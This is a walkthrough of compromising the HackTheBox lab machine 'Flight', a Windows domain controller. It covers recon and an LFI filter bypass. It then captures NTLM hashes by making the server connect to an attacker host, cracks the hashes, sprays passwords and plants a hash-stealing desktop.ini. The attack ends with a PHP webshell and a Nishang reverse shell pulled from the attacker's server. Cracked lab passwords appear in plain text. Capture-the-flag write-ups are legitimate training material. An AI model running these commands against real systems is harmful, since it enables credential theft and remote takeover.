โœˆ๏ธFlight

rustscan --addresses 10.10.11.187 --ulimit 5000 -- -A -sC -sV -Pn -T4

nmap -p- 10.10.11.187 --min-rate 5000

nmap -p 53,80,88,135,139,389,445,464,593,636,3268,3269,9389 -sC -sV -oN nmapscan 10.10.11.187 -T5

UDP nmap port scanning

nmap -T4 -n -Pn -sU --top-ports=50 flight.htb -oA udp-top-50

nmap -p- --min-rate 10000 10.10.11.187

nmap -sCV -p 53,80,88,135,139,389,445,464,593,636,5985,9389 10.10.11.187

This looks like a Windows DC with the domain name flight.htb, and a hostname of G0.

Lots of ports to potentially look at. I'll prioritize SMB and Web, and check in with LDAP, Kerberos, and DNS if I don't find what I need from them.

DNS Enumeration

Attempt a DNS zone transfer:

dig axfr flight.htb @10.10.11.187

Let's query all the DNS records:

dig any flight.htb @10.10.11.187

Web server Enumeration

Let's start by taking a quick look at the different features of the website.

It's a static page and likely won't be useful. Let's continue our enumeration.

Web technologies profiling

whatweb -a 3 flight.htb

The website is running on Apache webserver and is using PHP. After some research, I found no interesting vulnerabilities that affected those technologies.

Web crawling

I'll use a web crawler called ReconSpider to gather any links, email addresses, forms, or comments that could help me move forward.

Directory fuzzing

https://www.thehacker.recipes/web/recon/directory-fuzzing

Fuzzing tools

gobuster dir --useragent "PENTEST" --wordlist "/path/to/wordlist.txt" --url $URL

wfuzz --hc 404,403 -H "User-Agent: PENTEST" -c -z file,"/path/to/wordlist.txt" $URL/FUZZ

ffuf -H "User-Agent: PENTEST" -c -w "/path/to/wordlist.txt" -maxtime-job 60 -recursion -recursion-depth 2 -u $URL/FUZZ

feroxbuster -H "User-Agent: PENTEST" -w "/path/to/wordlist.txt" -u http://192.168.10.10/

feroxbuster -H "User-Agent: PENTEST" -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -u http://10.10.11.187/


Virtual hosts fuzzing

Subdomain Fuzz

wfuzz -u http://10.10.11.187 -H "Host: FUZZ.flight.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --hh 7069

What this command does:

  • -u http://10.10.11.187 Sends requests to the web server at 10.10.11.187 (target IP).

  • -H "Host: FUZZ.flight.htb" Replaces FUZZ with each word from the wordlist in the Host: header โ€” so youโ€™re testing subdomain.flight.htb values while connecting to the IP directly (common technique for virtual-hosted sites).

  • -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt Wordlist of candidate subdomain names used to replace FUZZ.

  • --hh 7069 Hides responses whose size (in characters) equals 7069. This is used to filter out the common โ€œnot foundโ€ / default page the server returns so obvious noise isnโ€™t shown. You can also base filters off a baseline response. wfuzz.readthedocs.io

Why --hh is useful here

Web servers often return a default page (soft 404) with the same size for "missing" subdomains. By hiding that character-length you reduce noise and surface only responses that differ (potentially valid subdomains). The docs show this exact technique (using --hh or a baseline).
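Where does a number like 7069 come from? You can measure it yourself by requesting a vhost that certainly doesn't exist and counting the body bytes. A small sketch (the `baseline_size` helper name is mine):

```shell
# Body size (in bytes) of the soft-404 page for a junk vhost --
# this is the number to feed wfuzz's --hh filter
baseline_size() {
  # $1 = target IP, $2 = non-existent Host header value
  curl -s -H "Host: $2" "http://$1/" | wc -c | tr -d ' '
}
# baseline_size 10.10.11.187 doesnotexist.flight.htb
```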

Suggested improvements / practical tips

  • add color + more threads + save output:

    wfuzz -c -t 50 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
      -H "Host: FUZZ.flight.htb" -u http://10.10.11.187 --hh 7069 -o results.txt

    -c = colored output, -t 50 = 50 threads, -o = output file.

  • combine filters: if you know the server returns 404 status too, hide it with --hc 404 and --hh 7069 together to be stricter.

  • use a baseline request to auto-capture the default response and then refer to it (docs show how to use a baseline token like BBB to build filters automatically). wfuzz.readthedocs.io

  • try smaller, focused wordlists first (top 5k is fine) โ€” then expand if needed.

  • if you want DNS-level confirmation (to avoid relying on Host header responses), run DNS brute force / massdns / dig against flight.htb names (but only in-scope / authorized targets).

  • if you see 302/301 redirects with 0-length bodies, follow up manually (they may be interesting endpoints).

I'll add both discovered vhosts to my /etc/hosts file along with the hostname:

10.10.11.187 flight.htb school.flight.htb g0.flight.htb

SMB - TCP 445

crackmapexec confirms the domain and host name

crackmapexec smb 10.10.11.187

It isn't able to get any information about shares:

crackmapexec smb 10.10.11.187 --shares

crackmapexec smb 10.10.11.187 --shares -u 0xdf -p ''

flight.htb - TCP 80

Most of the links are dead or just lead back to this page.

Tech Stack

The "AIRLINES International Travel" link leads to index.html, which suggests this is a static site.

The response headers don't give much additional information either, other than confirming what nmap also found - the web server is Apache:

curl -s -D - -o /dev/null -H "Host: flight.htb" http://10.10.11.187

HTTP/1.1 200 OK
Date: Fri, 28 Oct 2022 17:35:08 GMT
Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
Last-Modified: Thu, 24 Feb 2022 05:58:10 GMT
ETag: "1b9d-5d8bd444f0080"
Accept-Ranges: bytes
Content-Length: 7069
Connection: close
Content-Type: text/html

Thereโ€™s also a PHP version in that server header, which suggests PHP is enabled.

Directory Brute Force

I'll run feroxbuster against the site, and include -x html,php since I know the site is using .html extensions and potentially PHP:

feroxbuster -u http://flight.htb -x html,php

/phpmyadmin is on the box, but returns a 403 Forbidden on visiting.

con, aux, and prn all return 403 for .php, but /con and /con.html return the same. Since these are reserved device names on Windows, this seems more like an Apache rule match than actual pages.

school.flight.htb - The site is for an aviation school

The site is all placeholder text and a few page links, but nothing interesting.

The main page is index.php. In fact, the other pages that have content have URLs of the form http://school.flight.htb/index.php?view=about.html.

It's a very common PHP structure where different pages on a site all use index.php to define the header, footer, and menus, with a parameter specifying which page to include as the body. These are often vulnerable to path traversal (reading outside the current directory) and local file inclusion (including PHP code that is executed) vulnerabilities.

Directory Brute Force

feroxbuster -u http://school.flight.htb -x html,php

As you can see, the view parameter seems to display the content of a page.

When seeing such things, I generally think of directory path traversal and file inclusion (LFI, RFI) attacks.

Directory path traversal

On a Linux box, I'd try to read /etc/passwd. Since this is Windows, I'll try C:\windows\system32\drivers\etc\hosts, but it returns an error:

http://school.flight.htb/index.php?view=blog.html

http://school.flight.htb/index.php?view=../../../../../../../../../windows/system32/drivers/etc/hosts

It seems there is some sort of filtering in place on the server. Let's figure out exactly what is being blocked.

When replacing blog.html with index.php in the view parameter, I came across this

In fact, just view=\ results in the same blocked response. view=. returns nothing, but anything containing .. also triggers the blocked message.

I can try with / instead of \, make sure to use an absolute path, and it works:

http://school.flight.htb/index.php?view=c:/windows/system32/drivers/etc/hosts
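With the forward-slash bypass confirmed, a tiny helper makes it quick to pull more files through the same parameter (the `lfi_read` name and the candidate paths below are my suggestions, not from the box):

```shell
# Read an arbitrary file through the vulnerable view parameter
lfi_read() {
  curl -s "http://school.flight.htb/index.php?view=$1"
}
# Candidates worth trying:
# lfi_read 'c:/windows/win.ini'
# lfi_read 'c:/xampp/apache/conf/httpd.conf'   # XAMPP path is a guess
```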

Remote File Inclusion

Thinking a little outside the box, there is another approach that might work well here. From previous enumeration, we already know this is a Windows host with SMB running. What if we make the web server connect to a share on our machine? If everything goes well, it will try to authenticate to our SMB server, and we can capture its Net-NTLMv2 hash and crack it.

Let's set up a Responder listener and see if the page calls back:

responder -I tun0

http://school.flight.htb/index.php?view=//10.10.16.4/gggg

Responder captures a Net-NTLMv2 hash for svc_apache. Save it in a file and crack it:

hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt

S@Ss!K@*t13

crackmapexec smb flight.htb -u svc_apache -p 'S@Ss!K@*t13'

crackmapexec smb flight.htb -u svc_apache -p 'S@Ss!K@*t13' --shares

Before moving on from CME, let's use --rid-brute to enumerate users:

crackmapexec smb flight.htb -u svc_apache -p 'S@Ss!K@*t13' --rid-brute | grep SidTypeUser

We've found several. Let's add them to a file called users.txt.
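That extraction can be done in one pipeline; the awk split assumes the usual CME line format ("... 1106: flight\svc_apache (SidTypeUser)"):

```shell
# Strip the rid-brute output down to bare usernames, one per line
crackmapexec smb flight.htb -u svc_apache -p 'S@Ss!K@*t13' --rid-brute |
  awk -F'\\' '/SidTypeUser/ {sub(/ .*/, "", $2); print $2}' > users.txt
```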

A simple redirect:

nxc ldap 10.10.11.187 -u svc_apache -p 'S@Ss!K@*t13' --users > users1.txt

Or view the output and save it at the same time:

nxc ldap 10.10.11.187 -u svc_apache -p 'S@Ss!K@*t13' --users | tee users1.txt

Let's try spraying the password we have against our user list:

crackmapexec smb flight.htb -u users.txt -p 'S@Ss!K@*t13' --continue-on-success

S.Moon is using the same password as svc_apache.

Unfortunately, we still don't have local auth privileges on the target. What is interesting, though, is that we now have both read and write access to the Shared SMB share, whereas svc_apache only had read permissions.


Auth as C.Bum

SMB

In addition to the read access, S.Moon has write access to Shared

crackmapexec smb flight.htb -u S.Moon -p 'S@Ss!K@*t13' --shares

Let's check whether these credentials give remote execution. impacket-psexec needs a writable share to upload its payload, so if any share is writable for us, we get a shell:

impacket-psexec flight/svc_apache:'S@Ss!K@*t13'@10.10.11.187

impacket-psexec flight/S.Moon:'S@Ss!K@*t13'@10.10.11.187

https://gitlab.com/pentest-tools/PayloadsAllTheThings/-/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#scf-and-url-file-attack-against-writeable-share

https://arttoolkit.github.io/wadcoms/NTLM-stealing_creds-desktop/

Create a malicious desktop.ini:
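The notes don't show the file contents; a minimal desktop.ini that forces Explorer to fetch an icon from our SMB listener would look like this (10.10.16.4 is the attacker IP used earlier; the share and icon names are arbitrary):

```shell
# Write a desktop.ini whose IconResource points at our Responder host;
# Explorer authenticates to us when someone views the folder
cat > desktop.ini <<'EOF'
[.ShellClassInfo]
IconResource=\\10.10.16.4\share\icon.ico
EOF
```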

Start responder

responder -wv -I tun0

Now I'll upload desktop.ini to the Shared share:

smbclient //10.10.11.187/Shared -U s.moon

Now we can check Responder for a captured hash.

Now we'll crack the hash:

john --wordlist=/usr/share/wordlists/rockyou.txt hashcbum

Tikkycoll_431012284 (c.bum)

hashcat -m 5600 hashcbum /usr/share/wordlists/rockyou.txt

Now we'll try to access the shares:

smbclient -L //10.10.11.187 -U c.bum

impacket-psexec flight/c.bum:'Tikkycoll_431012284'@10.10.11.187

crackmapexec smb flight.htb -u c.bum -p 'Tikkycoll_431012284' --shares

Now try to access the web share

smbclient //10.10.11.187/web -U c.bum

This application runs on PHP, so we can create a PHP reverse shell and upload it. Let's test that first.

Create a test file:

Now we'll upload the file.

Now we will create the revshell

https://www.revshells.com/
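For the ?cmd= test used below, hello.php can be as small as the classic one-liner (this exact content is my assumption; any PHP command shell works):

```shell
# Minimal PHP command shell to upload to the web share
cat > hello.php <<'EOF'
<?php system($_REQUEST['cmd']); ?>
EOF
```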

Now upload the revshell hello.php.

Now access the file via the web: http://flight.htb/hello.php?cmd=whoami

We'll try to get a reverse shell using a Nishang shell:

https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

Append Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.4 -Port 7575 as the last line of the file, using your Kali IP and port.

Start the listener and the Python web server:

python -m http.server 8080

nc -nvlp 7575

Type the command in the execution box and click execute.
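The same cradle can also be fired from the CLI through the webshell, which URL-encodes it properly (the `wsh` helper name is mine; the IP, port, and filename follow the steps above):

```shell
# Run a command through the uploaded webshell
wsh() {
  curl -s -G 'http://flight.htb/hello.php' --data-urlencode "cmd=$1"
}
# Pull and run the Nishang shell (connects back to the nc listener):
# wsh "powershell -c IEX(New-Object Net.WebClient).DownloadString('http://10.10.16.4:8080/Invoke-PowerShellTcp.ps1')"
```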

Pwned C.Bum

WinRM is unfortunately not enabled on this box. However, we can access the user's working directory via the Users share. Let's retrieve the user.txt flag.
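A sketch of grabbing the flag over SMB (the `fetch_flag` name is mine, and the desktop path is the usual default profile location, an assumption):

```shell
# Fetch user.txt from C.Bum's desktop via the Users share
fetch_flag() {
  smbclient //10.10.11.187/Users -U 'c.bum%Tikkycoll_431012284' \
    -c 'get "C.Bum\Desktop\user.txt" user.txt'
}
# fetch_flag
```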

Summary

The hidden IIS instance on port 8000 ran with a writable web root by c.bum. Uploading an ASPX shell delivered an internal Meterpreter session.

Details

I noticed an inetpub folder in the root of the C: drive, which is odd because we know from the nmap scan that Apache is running, not IIS.

Taking a further look, I can see that port 8000 is listening, but it doesn't show up in the nmap scan either. It's probably blocked by the firewall:

netstat -a -p tcp

I investigated the contents of inetpub more thoroughly and discovered that c.bum has write access to the "development" folder:

Intrusion

Looking at the URL, it seemed the website might suffer from Local File Inclusion (LFI) or Remote File Inclusion (RFI). We tried some parameters, and it turned out some protection was in place.
